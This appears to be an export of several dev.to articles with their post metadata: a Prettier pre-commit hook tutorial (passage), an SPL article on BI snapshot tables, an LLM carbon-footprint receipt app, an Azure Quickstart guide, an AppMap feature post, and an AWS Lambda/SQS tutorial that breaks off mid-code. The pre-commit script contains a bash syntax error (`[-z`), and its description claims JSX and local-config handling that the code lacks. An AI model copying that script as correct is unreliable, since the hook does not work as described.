You can customize these options to suit your project’s coding style and conventions. For a full list of options and their values, see the [Prettier documentation](https://prettier.io/docs/en/options.html).
### Step 3: Create a Local Prettier Configuration File
When working on a project with an existing .prettierrc configuration, you may find that the formatting is difficult to read and work with or doesn’t match your personal preferences. For example, the line width may be set to 80, which can be too small for some screen sizes and cause discomfort when reading the code. To address this issue, you can create a local configuration file that allows you to override the global Prettier configuration and customize the formatting options to your preferences.
To create a local configuration file, create a file called .prettierrc.local.json in the root of your project and specify the desired formatting options. For example, you can set the tab width to 4 spaces instead of the 2 spaces specified in the global configuration. This ensures that your code is formatted according to your preferences without affecting the formatting of other files in the project.
```json
{
"tabWidth": 4,
"printWidth": 120
}
```
This configuration specifies that Prettier should use 4 spaces for indentation, instead of the 2 spaces specified in the global configuration and change the line width to 120 instead of the default 80 characters.
Additionally, to ensure that your changes to the code do not cause unnecessary formatting changes when committing the code, We will use a pre-commit hook. This hook runs Prettier on the files that are about to be committed and ensures that they are formatted according to .prettierrc configuration file. This way, your code is formatted according to your preferences while still maintaining consistency with the project’s overall formatting standards.
### Step 4: Configure VS Code to Use the Local Configuration File
To use the local configuration file in VS Code, you need to add the prettier.configPath option to your VS Code settings. This tells the Prettier extension to use the local configuration file instead of the global configuration file.
To do this, open your VS Code settings (File > Preferences > Settings or using the shortcut Ctrl+,), and add the following line to your settings:
```json
{
"prettier.configPath": "./.prettierrc.local.json"
}
```
This configuration specifies the path to the local configuration file.
### Step 5: Install the Prettier Extension in VS Code
To use Prettier in VS Code, you must also install the Prettier extension. The extension provides integration with Prettier and makes it easy to run Prettier on your code directly from the editor.
To install the Prettier extension, open the Extensions view in VS Code (View > Extensions or using the shortcut Ctrl+Shift+X), search for “Prettier — Code formatter”, and click the Install button.
### Step 6: Create a Pre-Commit Hook
Now that Prettier is installed and configured, you can create a pre-commit hook that will automatically run Prettier on your code before each commit, and ensure that all code is properly formatted.
Create a file called .git/hooks/pre-commit (without a file extension) in your project, and add the following contents:
```bash
#!/bin/bash
# Get the list of files added or modified in this commit
files=$(git diff --cached --name-only --diff-filter=ACM | grep "\.js$")
# If there are no JavaScript files, exit without doing anything
if [-z "$files"]; then
exit 0
fi
# Run Prettier on the changed files using the shared configuration file
echo "Running Prettier on the following files:"
echo "$files"
for file in $files; do
npx --no-install prettier --config .prettierrc --write "$file"
git add "$file"
done
```
This script does the following:
- It uses Git to determine which files have been modified and staged for commit and filters the list to include only JavaScript and JSX files.
- It runs Prettier on the staged files using both the global configuration file and the local configuration file and writes the corrected formatting back to the files.
- It uses Git to add the modified files back to the index so that the corrected formatting is included in the commit.
- It prints a message to the console indicating that Prettier has formatted the code.
- This script ensures that all staged JavaScript and JSX files are automatically formatted with Prettier before each commit, using both the global and local configuration files.
Make sure to make the pre-commit hook executable by running the following command in your bash terminal:
```bash
chmod +x .git/hooks/pre-commit
```
### Step 7: Test the Pre-Commit Hook
To test the pre-commit hook, you can create a test commit that introduces some formatting errors in your code, and see if the hook detects and fixes them before the commit is made.
Here’s an example workflow for testing the pre-commit hook:
1. Create a new file called test.js in your project directory and add some intentionally bad formatting to it. For example:
```javascript
const test=()=>{console.log('test');}
```
2. Stage the file for commit using git add test.js .
3. Attempt to commit the changes using git commit -m “Test commit”.
4. If the pre-commit hook is working properly, it should detect the formatting errors in test.js and fix them automatically. The output in your terminal should look something like this:
```bash
Running Prettier on the following files:
test.js
[warn] test.js
Code formatted with 1 warning
```
The [warn] message indicates that Prettier has detected a formatting error in the file, and the Code formatted with 1 warning message indicates that Prettier has corrected the formatting error.
Conclusion
By following the steps in this tutorial, you can ensure that all of your code is consistently formatted, without having to spend time manually formatting each file. This can save you time and reduce the risk of formatting-related errors in your code.
If you enjoy automating tasks in your development workflow, you might also be interested in my other post on [automating the creation of React components](https://dev.to/mazenadel19/automate-the-boring-stuff-in-react-589m-temp-slug-7517845).
I hope this tutorial has been helpful. If you have any questions or feedback, please let us know in the comments! | mazenadel19 |
1,515,744 | Why Are There So Many Snapshot Tables in BI Systems? | There is a phenomenon that in BI systems of some big organizations there are a lot of snapshot tables... | 0 | 2023-06-24T23:55:35 | https://dev.to/jbx1279/why-are-there-so-many-snapshot-tables-in-bi-systems-4llo | database, bigdata, sql, programming | There is a phenomenon that in BI systems of some big organizations there are a lot of snapshot tables in their data warehouses. Take the BI system of a certain transaction business as an example. There are the huge transaction details table stored as a number of segment tables by month, and some tables that are not very large. The smaller tables, such as customer table, employee table and product table, need to associate with the larger transaction details table. At the end of each month, all data of these smaller tables are stored as snapshot tables in order to match the current month’s transaction details segment tables.
Why they need so many seemingly redundant snapshot tables?
The transaction details table is a familiar type of fact table. A fact table stores data of actual occurrences. And it will become larger as time goes by. There are various other kinds of fact table, such as orders table, insurance policy table and bank transaction records table. A fact table is often associated with other tables through certain code fields. For instance, transaction details table relates to customer table, employee table and product table through customer id, employee id and product id respectively, orders table relates to product table through product id field, and bank transaction records tables relates to user table through user id. These tables related to the fact table are called dimension tables. In the following figure, the transaction details table and the customer table have a relationship of fact table and dimension table:

The reason of associating a fact table with a dimension table is that we need fields in a dimension table in computations. As the above shows, after joining detail table and customer table, we can group the former by customer’s city and calculate the total amount and count transactions in each group, or perform other computations.
Data in a dimension table is relatively stable though there are modifications. Update of a dimension table won’t affect the newly-generated data in the fact table, but it is likely that the fact table’s historical data does not match the dimension table’s new data. In this case, if we try to associate old data in the fact table with the new data in the dimension table, errors will occur.
Let’s look at an instance. There is a customer James whose code is B20101. He lived in New York and had some transaction records. He then moved to Chicago on May 15, 2020 and had new transaction details records. If we just change James’ city to Chicago in customer table, his transactions occurred in New York will be treated as in Chicago when we group detail records by customer’s city and calculate total amount in each city. That’s an error. The error occurs because which city a James’ transaction record belongs to is determined by time. Putting all records to either New York or Chicago is incorrect.
If we ignore the error, aggregate values on the historical data in the BI system and those on the newly-generated data in the ERP system will not match. And the mismatch errors are hard to detect.
Snapshot tables appear as a solution. Generate snapshot of a data table at a fixed time (such as at the end of each month), and store data of the fact table within a specified time period (like one month) and the whole data of the dimension table at that time for later analysis and computation. This way the fact table will be always related to the dimension table in the corresponding time, and aggregate values will be correct.
But this results in many redundant dimension data and increases database storage load. Moreover, there are multiple dimension tables, and each dimension table corresponds to multiple snapshot tables, causing extremely complicated inter-table relationships and greatly complexing the whole system.
Another consequence is that code becomes complicated. For example, there will be one transaction details table and a batch of dimension table snapshots for each month. If we want to group details records by customer’s city and calculate transaction amount and count transactions in each city within one year, we need to associate every month’s transaction details table with their dimension table snapshots and perform eleven UNIONs. This is just a simple grouping and aggregation operation. For more complicated analysis and computations, we will have very long and complex SQL statements. They are hard to maintain and even difficult to optimize. That’s why many BI systems that use the snapshot solution prohibit analysis and computations on data within a long time period. Sometimes they only allow computations on data in one unit time period (like one month).
The snapshot solution also cannot completely resolve the issue of incorrect query result resulted by the change of data in dimension tables. It is impossible for a BI system to generate a snapshot instantly each time when data in a dimension table is changed (if so, there will be too many snapshot tables and storage load will be huge). Generally, snapshot tables are only generated at specified time interval. Between the two time points when snapshot tables are generated, computing errors will still occur if there are any changes in dimension table data. Suppose snapshot tables for transaction details table and customer table are generated on the last day of each month and James moves from New York to Chicago on May 15, then on May 31 when the snapshot tables are generated, James’ city will be regarded and saved as Chicago. In June when we try to perform a query on data of May, errors will appear because James’ transactions from May 1 to 15 that should have been put under New York are mistaken for Chicago’s, though the error is not a serious one.
A workaround is to generate a wide table based on the fact table and the dimension table. According to this method, we join the transaction details table and the customer table to create a wide transaction table. In this wide table, information such as customer names and cities are not affected by the change of data in the customer dimension table. And this method ensures a simple data structure in the system. Yet, the same problem still exists. As the wide table is generated at a specified time interval (generating wide table records in real-time will be a drag on performance), any change of data in the dimension table between two generation time points will result in an error. What’s more, as the fact table and a dimension table have a many to one relationship, there will be a lot of redundant customer data in the wide transaction table, which leads to inflation of the fact table whose space usage will be far heavier than that of the snapshot tables. There’s one more problem. The wide table structure makes maintenance inconvenient, particularly when more fields need to be added, because we need to take care of the handling of the large volume of historical data. To make this simple, we have to specify as complete fields as possible when defining the wide table. A large and comprehensible wide table occupies larger space.
Let’s look at the issue in another way. Though dimension table data may change, it changes little. The amount of data updated is one or several orders of magnitudes smaller than the total data amount. Knowing this helps us use it to design a cost-effective solution.
The open-source data computing engine SPL uses this characteristic to design the **time key** mechanism. The mechanism can efficiently and precisely solve the issue caused by dimension table update.
The mechanism works like this. We add a time field in the dimension table. This new time field, which we call time key, and the original primary key field combine to form a new composite primary key. When joining the fact table and the dimension table, we create an association between the combination of the original foreign key field and a relevant time field in the fact table and the new composite primary key in the dimension table. This time-key-style association is different from the familiar foreign-key-style association. Records are not compared according to equivalence relations but are matched based on “the latest record before the specified time”.
Take the above transaction details table and customer table as examples. We add an effective date field edate to the customer table, as the following figure shows:

edate field contains the date when the current record appears, that is, the date when an update occurs. For instance, below is the customer table after James moves to Chicago:

As above shows, James has only one dimension record i before he moves to Chicago, and on the date when he moves record ii appears. The effective date is the date when he moves, which is 2020-05-15.
In this case, the SPL join between transaction details table and customer table will, except for comparing values between cid and id, also compare values between ddate and edate that records the record’s time of appearance and find out the record having the largest edate value that is not greater than ddate. This is the correct matching record (which is the latest record before the specified time point). As transaction records before James’ relocation are all before 2020-05-15, they will relate to record i in customer table where the effective date is 2017-02-01 and will be regarded as belonging to New York. The transaction records after James’ relocation fall on or after 2020-05-15, so they will relate to record ii where the effective date is 2020-05-15 and put under Chicago.
By using the time key mechanism, the joining result conforms to the facts. SPL can obtain correct results in later computations because it adds a record to the dimension table and stores the effective date at the time when the update occurs. The approach avoids the problem caused by generating snapshots and wide tables at regular time, and thereby getting rid of errors in performing computations within two regular time points.
Changes of data in a dimension table are small. There is little change in the size of a dimension table after the effective time information is added. Storage load will not increase noticeably.
In theory, we can add similar time field in a dimension table in the relational database. The problem is that we cannot express the join relationship. Obviously, the time-key-based association is not the commonly seen equi-join. Even if we try to use the non-equi-join to achieve the association, we need the complex subqueries to select the latest dimension table records before we perform the join. The statement is too complicated and the performance is unstable. With relational databases, we have no choice but using the snapshot/wide table solution.
The SPL code for achieving the time key mechanism is simple, as shown below:
```
A B
1 =T("customer.btx") >A1.keys@t(id,edate)
2 =file("detail.ctx").open().cursor() =A2.switch(cid:ddate,A1)
3 =B2.groups(cid.city;sum(amt),count(~))
```
A1 imports the customer table. B1 defines a new composite primary key using id and edate; @t option means the last field of the primary key is a time key. We can use the high-precision datetime field as the time key as needed.
A2 creates cursor for the transaction details table.
B2 creates association between A2’s cursor and A1’s customer table. The detail table’s joining fields are cid and ddate, and the customer table’s is the primary key. The operation works the same as one between regular dimension tables without a time keys.
A3 groups records in the joining result set by customer’s city, and calculates total amount and counts transactions in each city. In this step time keys are not involved.
The time key mechanism is one of SPL’s built-in features. The performance gap between a computation using the mechanism and one without using it is very small. Same as joins involving regular dimension tables, one can perform aggregations on any time ranges. There are no time limits as snapshot approach has.
The SPL time key mechanism deals with dimension data change issues in a convenient way. The fact table remains what it is, and we add a time field to the dimension table and record data change information only. The design ensures correct result and good performance while eliminating a large number of snapshot tables and reducing system complexity. It also avoids serious data redundancy resulted from wide table solution, and maintains a flexible system architecture.
Click to share on Facebook (Opens in new window)Click to share on Twitter (Opens in new window)Click to share on LinkedIn (Opens in new window)
Origin: https://blog.scudata.com/why-are-there-so-many-snapshot-tables-in-bi-systems/
SPL Source: https://github.com/SPLWare/esProc
| jbx1279 |
1,517,384 | How to build a LLM powered carbon footprint analysis app | In this post I am going to showcase how you can build an app that analyzes the carbon footprint of... | 0 | 2023-06-27T06:54:09 | https://codesphere.com/articles/llm-powered-carbon-footprint-app | tutorial, largelanguagemodels, ai, carbonfootprint | ---
title: How to build a LLM powered carbon footprint analysis app
published: true
date: 2023-06-26 13:03:07 UTC
tags: Tutorial,largelanguagemodels,AI,Carbonfootprint
canonical_url: https://codesphere.com/articles/llm-powered-carbon-footprint-app
---

In this post I am going to showcase how you can build an app that analyzes the carbon footprint of your grocery runs using the latest advances in large language models. We will be using the aleph alpha LLM API combined with Microsofts Azure form recognizer in Python to build something truly amazing.
The app behind todays post is bigger than usual and initially took months of fine tuning and work - it was the center piece of my previous startup Project Count. We tried to develop a convenient way to track how your daily actions influence your personal carbon footprint. Since we stopped development of that project I'm using this post as an opportunity to open-source our code and show more people how you can use the advances in AI to make a positive impact.
The app is currently available for testing here: [https://40406-3000.2.codesphere.com/](https://40406-3000.2.codesphere.com/?ref=dev.to) (Subject to availability of my free API credits :D)
The entire code discussed here today alongside some example receipts can be found on GitHub: [https://github.com/codesphere-cloud/large-language-example-app](https://github.com/codesphere-cloud/large-language-example-app)
If you want to follow along check it out locally or on Codesphere and grab yourself the two API keys required. Both of them allow you to get started for free!
### How you can get it running
Clone the repository locally or in [codesphere](https://welcome.codesphere.com/?utm_source=llm-article&utm_medium=blog&utm_campaign=blog) via: [https://codesphere.com/https://github.com/codesphere-cloud/large-language-example-app](https://codesphere.com/https://github.com/codesphere-cloud/large-language-example-app)
1. Run `pipenv install`
2. Get an API key for the large language model API from Aleph Alpha (free credits provided upon signup) [https://app.aleph-alpha.com/signup](https://app.aleph-alpha.com/signup?ref=dev.to)
3. Sign up to Microsoft Azure and create an API key for the form recognizer (12 months free + free plan with rate limits afterwards) [https://azure.microsoft.com/en-us/free/ai/](https://azure.microsoft.com/en-us/free/ai/)
4. Set `ALEPH_KEY` env variable
5. Set `AZURE_FORM_ENDPOINT` env variable
6. Set `AZURE_FORM_KEY` env variable
7. Run `pipenv run python run.py`
8. Open localhost on port 3000
### How it's built part 1 - components / frameworks
| Framework | What it does |
| --- | --- |
| Pyhton (Flask) | Puts everything together, runs calculations & server |
| Aleph Alpha | Semantic embeddings for similarity via LLM API |
| Microsoft Form recognizer | OCR service to turn pictures of receipts into usable structured data |
| Jinja | Frontend template engine, generates the HTML served to users |
| Bootstrap | CSS utility functions for styling the frontend |
Basically we are using Python, more specifically Flask to put it all together and do some data manipulation. The actual AI stuff is pulled from two third party providers, Microsoft for the form recognizer OCR (because it's outstanding & free to start) and Aleph Alpha to create semantic embeddings based on their large language model. We could easily switch that to use OpenAi GPT-4 API for this as well - the main reason we use Aleph Alpha here is because the initial version of this was built before the chatGPT release and OpenAi's pricing did not make it that easy to get started then. I'd love to see a performance comparison between the two here and I welcome anyone to create a fork of the repo to try this themselves - let me know!
There are lot of great tutorials out there on how to set up a flask app in general, I will focus on the specific receipt analysis part which I basically just embedded into a single route flask app based on the standard template.
### How it's built part 2 - analysis.py
From the front end route we send the image bytes submitted via a file upload form.
The first function is called `azure_form_recognition`, it takes the image runs it against Microsofts OCR called form recognizer - it has a pre-build model to recognize receipts.
We iterate over the result item and grab fields like product description, quantity, total and the the store if available. Also I added some data manipulation to recognize if a quantity is an integer or a float with `,` or `.` which happens for weighted items like loose fruit and vegetables. It's not 100% correct for all types of receipts but this was tested and optimized based on real user data (>100 German receipts).
```python
def azure_form_recognition(image_input):
document = image_input
document_analysis_client = DocumentAnalysisClient(
endpoint=endpoint, credential=AzureKeyCredential(key)
)
poller = document_analysis_client.begin_analyze_document("prebuilt-receipt", document)
receipts = poller.result()
for idx, receipt in enumerate(receipts.documents):
if receipt.fields.get("MerchantName"):
store = receipt.fields.get("MerchantName").value
else:
store="Unknown store"
if receipt.fields.get("Items"):
d = []
for idx, item in enumerate(receipt.fields.get("Items").value):
item_name = item.value.get("Description")
if item_name:
d.append( {
"description": item_name.value,
"quantity" : [float(re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", item.value.get("Quantity").content)[0].replace(",",".")) if item.value.get("Quantity") and item.value.get("Quantity").value !=None else 1][0],
"total" : [item.value.get("TotalPrice").value if item.value.get("TotalPrice") else 1][0]
}
)
grocery_input = pd.DataFrame(d)
return grocery_input, store
```
The output dataframe is now passed to a function called `match_and_merge_combined` which takes the structured OCR result data, the excel based mappings for fuzzy string matching and the semantic embedding dictionary which we obtained by running a semantic LLM based embedding algorithm over the entire dataset (more on this later).
The mapping dataset with the carbon footprints is our own - over 6 month of research went into it. We combined publicly available data like [this](https://denstoreklimadatabase.dk/en?ref=codesphere.ghost.io) with other datasets and field studies on typical package sizes in German supermarkets.
```python
def match_and_merge_combined(df1: pd.DataFrame, df2: pd.DataFrame, col1: str, col2: str, embedding_dict, cutoff: int = 80, cutoff_ai: int = 80, language: str = 'de'):
# adding empty row
df2 = df2.reindex(list(range(0, len(df2)+1))).reset_index(drop=True)
index_of_empty = len(df2) - 1
# Context - provides the context for our large language models
if language == 'de': phrase='Auf dem Kassenzettel steht: '
else: phrase='The grocery item is: '
# First attempt a fuzzy string based match = faster & cheaper than semantic match
indexed_strings_dict = dict(enumerate(df2[col2]))
matched_indices = set()
ordered_indices = []
scores = []
for s1 in df1[col1]:
match = fuzzy_process.extractOne(
query=s1,
choices=indexed_strings_dict,
score_cutoff=cutoff
)
# If match below cutoff fetch semantic match
score, index = match[1:] if match is not None else find_match_semantic(embedding_dict,phrase+s1)[1:]
if score < cutoff_ai:
index = index_of_empty
matched_indices.add(index)
ordered_indices.append(index)
scores.append(score)
```
_Match based on fuzzy string first and then via semantic similarity_
The mapping is called combined because we first run a fuzzy string based matching algorithm with a cutoff threshold - this is faster and computationally cheaper than running the LLM based semantic mapping and takes care of easy matches like `bananas` -> `banana` only if there is no match within the defined cutoff we call the `find_match_semantic` function.
This function takes the current item, creates a semantic embedding via Aleph Alphas API and compares it with all semantic embedding in the dictionary.
An embedding is basically a mathematical multi plane representation of what the LLM understands about that item and context. We can then calculate the cosine distance between embeddings and pick the embedding with the lowest distance. Large Language models can place similar items (within the given context of grocery receipt items) closer to each other allowing matches like `tenderloin steak` -> `beef filet` and creates remarkably accurate results based on our German receipts. From the chosen embedding we reverse engineer what item that embedding belongs to based on the index and therefore get the closest semantic match for each item.
```python
def find_match_semantic(embeddings, product_description: str):
embeddings_to_add = []
response = requests.post(
"https://api.aleph-alpha.com/semantic_embed",
headers={
"Authorization": f"Bearer {API_KEY}",
"User-Agent": "Aleph-Alpha-Python-Client-1.4.2",
},
json={
"model": model,
"prompt": product_description,
"representation": "symmetric",
"compress_to_size": 128,
},
)
result = response.json()
embeddings_to_add.append(result["embedding"])
cosine_similarities = {}
for item in embeddings:
cosine_similarities[item] = 1 - cosine(embeddings_to_add[0], embeddings[item])
result = (max(cosine_similarities, key=cosine_similarities.get),max(cosine_similarities.values())*100,list(cosine_similarities.keys()).index(max(cosine_similarities, key=cosine_similarities.get)))
return result
```
From there we do a bunch a data clean-up, remove NaN's, do some footprint recalculation for items with non integer quantities. The logic is for integer items we simply take `typical footprint per package` \* `quantity` = `estimated footprint` whereas for float quantities we take calculate `typical footprint per 100g` \* `quantity converted to 100g` = `estimated footprint`.
These are of course only estimates but they have proven to be feasible on average in our previous startups app.
```python
# Detect if item is measured in kg and correct values
merged_df["footprint"]= (merged_df["quantity"]*merged_df["typical_footprint"]).round(0)
merged_df.loc[~(merged_df["quantity"] % 1 == 0),"footprint"] = merged_df["quantity"]*10*merged_df["footprint_per_100g"]
merged_df.loc[~(merged_df["quantity"] % 1 == 0),"typical_weight"] = merged_df["quantity"]*1000
merged_df.loc[~(merged_df["quantity"] % 1 == 0),"quantity"] = 1
merged_df["footprint"] = merged_df["footprint"].fillna(0)
merged_df["product"] = merged_df["product"].fillna("???")
merged_df = merged_df.drop(["index"], axis=1).dropna(subset=["description"])
# Type conversion to integers
merged_df["footprint"]=merged_df["footprint"].astype(int)
# Set standardized product descriptions
merged_df.loc[(~pd.isna(merged_df["value_from"])),"product"] = merged_df["value_from"]
```
The resulting dataframe is sent to the frontend as a jinja template variable and then looped over and displayed as table alongside the initial image.
### How it's built part 3 - Create the semantic embedding dict
This is a one time task for the dataset or after updating the mapping table - if you don't plan on modifying the dataset (i.e. for new items, different use cases i.e. home depot products instead groceries, or for translation to different languages) you can skip this step.
The code for this is stored in `search_embed.py` and it takes an Excel mapping table of the predefined format, appends some context (i.e. this is an item from a grocery receipt) to each item (needs to be language specific) and runs it via the LLM's semantic embedding endpoint. This task is computationally intense as it needs to call 1000s of items - therefore we only do this once and store the results json in a dictionary. The file will be quite large, over 50mb in my example.
To run this for an updated mapping excel, change the lines mentioned in the code comment and run it via `pipenv run search_embed.py` - for my ~1000 items this consumes about a quarter of my free Aleph Alpha credits. Make sure you don't run it more often than needed.
### How it's built part 4 - Language switch
The model and dataset is optimized for German grocery receipts. I've included an English version of the dataset (Google translate based) for demonstration purposes. To use that simply change the function called from routes from `analyze_receipt` to `analyze_receipt_en`, it will use the translated excel and embedding dictionary.
Please be aware that the translations are far from perfect and I did not run as extensive tests to see how well it performs in real world scenarios.
### Summary
I hope that I you guys were able to follow along, get your own version running and even got some inspiration on how the new possibilities of large language models can even be used to enable us to live more sustainably.
The GitHub Repo is public and I invite everyone to take it and continue developing from there - from my perspective all my input is now open source and public domain. Feel free to reach out if you want to continue the project or have any questions.
If you havn't checked out [codesphere](https://welcome.codesphere.com/?utm_source=llm-article&utm_medium=blog&utm_campaign=blog) - hosting projects like these (and much more) has never been easier. | simoncodephere |
1,518,218 | AZURE QUICKSTART CENTER: THE QUICKEST WAY TO UNDERSTANDING AZURE FUCTIONALITY AND USING AZURE SERVICES. | This blog is an overview of Azure Quickstart Center as a guide to an individual or organization who... | 0 | 2023-06-29T09:38:26 | https://dev.to/donhadley22/azure-quickstart-center-the-quickest-way-to-understanding-azure-fuctionality-and-using-azure-services-1o84 | **This blog is an overview of Azure Quickstart Center as a guide to an individual or organization who is new to the Microsoft Azure platform, who wishes to understand its structure, best practice and usage without wasting valuable time.**
We will begin by taking an overview of the **Azure Quickstart Center** and conclude by deploying an Azure resource using the Quickstart Center.
**OVERVIEW OF AZURE QUICKSTART CENTER**
The **Azure Quickstart Center** is the fastest way to explore and get yourself acquainted to the Azure architecture and services.
The quickstart center has a step-by-step guide of how to find your way around the Azure platform.
**Let us review some steps to getting the best out of Azure Quickstart Center.**
**STEP 1: OVERVIEW OF THE QUICKSTART CENTER**
- Sign into the Azure portal at https://portal.azure.com
- Type and select **Quick startcenter** in the search bar at the top of the page.

- In the **quick startcenter** page, you will be presented with two options of **Projects and guides** or **Take an online course**.
- Under **Projects and guides**, you have **Start a project** and right below, you will see the template of **seven** most popular Azure services. You may dive-in by selecting the service you wish to use. This will allow you learn, as you build new workloads in Azure.

- Or you scroll down further on same page to see the **Setup guides** that will walk you through deployment scenarios to help you set up, manage, and secure your Azure environment.

- On the other hand, you can select the **Take an online course** option if you wish to learn about Azure before using the service. This will usher you into a page that has **five** course modules that will guide you through the basis of understanding Azure, and also an option of **Browse our full Azure catalog** if you wish to see more.

You can select any of the above courses to start you Azure journey.
**STEP 2: QUICKEST WAY TO PROVISION A RESOURCE**
Let us look at another very important use of the **Quickstart center.**
When you wish to quickly deploy a resource in Azure, your surest and fastest means of achieving this is through the **Quickstart center**, because it provides you with access to deployment templates of all the Azure services with all the best-practice configurations in place.
**Let demonstrate this by creating a Web App**
- Go to **Quickstart center** and select **Projects and guides**, go to **Create a web app** and click **Start**.

This will take you to **Create a web app** page with two options **Build and host a web app with Azure Web Apps** or **Build and host a web app with Azure Web Apps with a database**.

We are selecting the first option for this exercise, since we just want to host a web app.
- Click the **Create** button.
This will open the page for us to enter the basic details of the web app such as **Resource group** and **Name** of the application.

- Scrolling further down the page, we will notice that every other configuration information has been provided by default. This makes it possible for us to create the application and start using it, saving us time and effort we would have spent on configuration.

- Click on **Review + create** button to start creating the web app.
This reviews and displays the information of the web app to be created.
- Click on the **Create** button.

Deployment is complete

- Click on **Go to resource**
Overview page of our **Web app**, ready for use.

**The Web App**

**Conclusion**
I hope this blog was able to serve as a guide to the best way to begin your Azure journey. You can now try deploying other resources through the **Azure Quickstart center**.
**Thanks for reading this article, please subscribe and follow my page**
| donhadley22 | |
1,520,123 | How to streamline and focus your sequence diagrams | AppMap’s new feature gives developers greater control over their sequence diagrams to enhance code... | 0 | 2023-06-28T19:38:01 | https://dev.to/appmap/how-to-streamline-and-focus-your-sequence-diagrams-3p7o | webdev, programming, news, vscode | **AppMap’s new feature gives developers greater control over their sequence diagrams to enhance code reviews.**
The value of sequence diagrams, especially for code reviews, [is growing](https://dev.to/appmap/quickly-learn-how-new-to-you-code-works-using-sequence-diagrams-h9g). And AppMap is at the cutting edge, creating new tools and capabilities for developers to generate and use sequence diagrams for designing and improving code quality from writing to reviewing. In this article, I’ll share a new filtering feature of our sequence diagram tool in AppMap.
### Taming the complexity of sequence diagrams
As software projects grow in size and complexity, so do the sequence diagrams generated from them that represent their inner workings. These diagrams often become extensive and overwhelming, making it challenging to decipher the flow of interactions and identify critical components. The AppMap user community has requested a way to declutter their [automatically-generated sequence diagrams](https://dev.to/appmap/automatically-generate-interactive-sequence-diagrams-of-your-java-codes-runtime-behavior-2jg0) in order to focus on the essential elements of their application.
We heard you, and we’re excited to share this new feature release. Read on for the details, and watch this walkthrough video to see it in action.
{% youtube 5uHA_pnKzIc %}
### Advanced filtering for unparalleled control
With our latest release, we added an enhanced filtering system that empowers developers to take control of their sequence diagrams by eliminating unnecessary noise and tailoring your diagrams to display only the information that matters most to you and your team.
**3 key functionalities**
1. Live filtering: Instantly reduce complexity by hiding specific components, such as external code or framework-related elements. With just a few clicks, you can create a clean, focused view of your sequence diagram.
2. Customizable views: Once you have refined your diagram to your liking, you can save that view as a filter. This means you can apply the filter to future app maps, whether you want it as a default setting for all diagrams or selectively choose where to apply it.
3. Seamless switching: Switching between different views is effortless. Just select the desired filter, and the diagram will dynamically update to display your preferred elements. No need to rebuild or navigate complex menus.

**Benefits and advantages**
AppMap's enhanced filtering feature goes beyond simplifying your sequence diagrams.
1. Persistence: Your custom filter views persist as long as the diagram remains open. This allows you to revisit and analyze your diagrams without losing your customized settings. If a diagram has been closed, getting that view back is as simple as reapplying the filter. If you find yourself applying the same filter to a majority of your sequence diagrams, set a previously saved filter as the default, providing a seamless experience across any sequence diagram you choose to open or share. Changing or setting a default view becomes as simple as clicking a button.
2. Intuitive interface: Our user-friendly interface ensures that applying filters and customizing your view is a breeze. With our configure-as-you-go model, developers spend less time configuring and more time gaining insights from their diagrams.
3. Increased efficiency: By decluttering your sequence diagrams and focusing on the relevant elements, you can make quick decisions on things that matter most, improving your code analysis efficiency and gaining a deeper understanding of your application's behavior on whatever scale you choose to view.
### Getting Started + community
Sequence diagrams are particularly useful for designing and testing software systems that involve multiple components, asynchronous events, or complex control flows. Learn more about the common use cases for sequence diagrams and how to interpret them [in this post](https://dev.to/appmap/quickly-learn-how-new-to-you-code-works-using-sequence-diagrams-h9g).
To try out our new filtering feature, [download AppMap](https://appmap.io/download) into your favorite IDE and use our [handy docs](https://appmap.io/docs/appmap-overview.html) to get started. We hope you enjoy exploring the possibilities, experimenting with different views, and revolutionizing how you analyze and understand your code!
To chat with us and other users about it and get your questions answered, [join our community](https://appmap.io/community).
Cover Photo by [Luca Bravo](https://unsplash.com/@lucabravo?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](href="https://unsplash.com/s/photos/sequence-diagram-coding?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)
{% user ghamelin%}
| ghamelin |
1,520,766 | Building a Serverless Program with AWS Lambda, DynamoDB, and SQS | Introduction: Serverless computing has revolutionized the way we develop and deploy... | 0 | 2023-06-29T17:48:06 | https://dev.to/vedvaghela/building-a-serverless-program-with-aws-lambda-dynamodb-and-sqs-2p8c | aws, serverless, dynamodb, lambda | ## **Introduction:**
Serverless computing has revolutionized the way we develop and deploy applications, offering scalability, cost-efficiency, and simplified management. In this blog, we'll explore how to build a serverless program using AWS Lambda, DynamoDB, and SQS (Simple Queue Service). By leveraging these powerful services, we'll create three Lambda functions to automate the processing of managing active and inactive accounts.
## **Why Serverless ?**
By adopting a serverless architecture, we can enjoy several advantages. Firstly, we don't need to manage any server infrastructure as AWS Lambda automatically handles the scaling, capacity provisioning, and fault tolerance. Secondly, we only pay for the compute resources used during the execution of the Lambda functions, allowing for cost optimization. Lastly, the decoupled nature of serverless components provides flexibility and enables independent development and scaling.
## **The Problem :**
For example, we have data of 10 accounts in DynamoDB => 4 are active and 6 are inactive. We need the Ids of inactive account to make them active and allocate them to their further use cases. When multiple users trigger lambdas to fetch data directly from DynamoDB to get their temporary account Ids, two lambdas may receive the same ID from the DynamoDB, when these two item fall under the same category of being Inactive.

## **Solution:**
This is solved by a simple method, i.e. by using Amazon SQS service.
Amazon SQS is a reliable, highly-scalable hosted queue for storing messages as they travel between applications or microservices. Amazon SQS moves data between distributed application components and helps you decouple these components.

## **Setup :**
**Dynamo DB :**
For simplicity in this example, we are designing a simple DynamoDB Structure with only 2 Attributes:
1. AccountID (String) => Partition Key
2. Status (String)
Example Table:

**SQS :**
Go to the SQS service and click on the create queue option.
Select Standard Queue as the type of queue, keep everything else as default and proceed to creating the queue.

After creation of the queue, go into "myTestQueue".

In the details block, take note of the **sqs url** which will used later in our serverless functions.
We can later check the contents of our queue by clicking on the "send and receive messages" button.
**We will be creating 3 lambda functions:**
1) dumpIntoSQS
2) receiveID
3) pushIntoSQS_uponChange
We will be using the AWS SDK for Python : [Boto3 ](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html
)
**1) dumpIntoSQS**
This function will dump the ids of all the inactive accounts present in our dynamodb table. This sets up the automation in motion.
```
import json
import boto3
import os
db_client = boto3.client('dynamodb')
sqs = boto3.client('sqs')
queue_url = os.environ['SQS_URL']
dynamodb_name = os.environ['DYNAMO_DB_NAME']
def lambda_handler(event, context):
#getting the Inactive account Ids from dynamodb
response = db_client.scan(
TableName=dynamodb_name,
FilterExpression='#st = :s_val',
ExpressionAttributeNames={
"#st" : "Status"
},
ExpressionAttributeValues={
':s_val': {'S':'Inactive'}
}
)
